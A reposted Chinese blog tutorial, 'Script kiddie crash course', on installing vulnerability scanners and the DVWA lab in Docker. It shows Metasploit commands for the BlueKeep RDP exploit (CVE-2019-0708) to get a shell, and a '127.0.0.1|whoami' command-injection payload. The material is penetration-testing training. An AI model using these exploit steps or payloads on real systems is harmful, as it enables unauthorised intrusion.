脚本小子速成教程

admin 2022年11月13日16:42:58安全闲碎评论14 views1138字阅读3分47秒阅读模式

脚本小子速成教程

一、工具安装

1.docker安装Nessus

(1)拉取镜像

docker pull tenableofficial/nessus

(2)启动镜像

docker run -d --name "Nessus"  -p 8834:8834 -e ACTIVATION_CODE=激活码 -e USERNAME=admin -e  PASSWORD=123456 tenableofficial/nessus

(3)打开前端页面

https://ip:8834

启动成功,等待安装插件

 脚本小子速成教程

(4)Nessus基础版激活码

https://zh-cn.tenable.com/products/nessus/nessus-essentials

(5)错误解决方法

进入docker中直接拉起Nessus

docker exec -it 容器id /bin/bash
cd /opt/scripts
 ./configure_scanner.py

2.docker安装AWVS

docker hub 直接搜索AWVS,找个较近的更新日期和下载量比较大的

其它,略

3.AppScan

自己找资源

其它,略

4.DVWA靶场

说明:https://github.com/digininja/DVWA/blob/master/README.zh.md

docker pull vulnerables/web-dvwa
docker run --rm -it -p 80:80 vulnerables/web-dvwa

 

二、工具使用

1.Nessus

这还用教吗

2.AppScan

 脚本小子速成教程


脚本小子速成教程

然后一直下一步,就可以自动扫描了

3.Goby

开箱即用

三、漏洞利用

1.系统漏洞利用(CVE-2019-0708

kali启动msf

脚本小子速成教程

脚本小子速成教程

脚本小子速成教程

脚本小子速成教程

脚本小子速成教程

脚本小子速成教程

 成功获取权限

 msfconsole
 search 0708    //搜寻0708字样的模块
 use /exploit/windows/rdp/cve_2019_0708_bluekeep_rce    //使用漏洞利用模块
 show options    //进入模块后查看模块选项
 set RHOSTS    //设置目标ip
 show targets    //查看目标类型的归类
 set target 2    //设置目标类型win7(vm)
 run    //执行漏洞利用
 shell    //返回成功后使用shell交互


2.web应用漏洞利用

进入靶场,账号密码admin/password

命令注入,在ping功能处注入命令

Plaintext
127.0.0.1|whoami

 脚本小子速成教程


四、总结

你已经是一个合格的渗透测试工程师了

 脚本小子速成教程

(图源自FREEBUF,侵删)


封面图:GodOfHacker

脚本小子速成教程

https://github.com/WWILLV/GodOfHacker

原文始发于微信公众号(SK安全实验室):脚本小子速成教程

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月13日16:42:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  脚本小子速成教程 http://cn-sec.com/archives/1406325.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: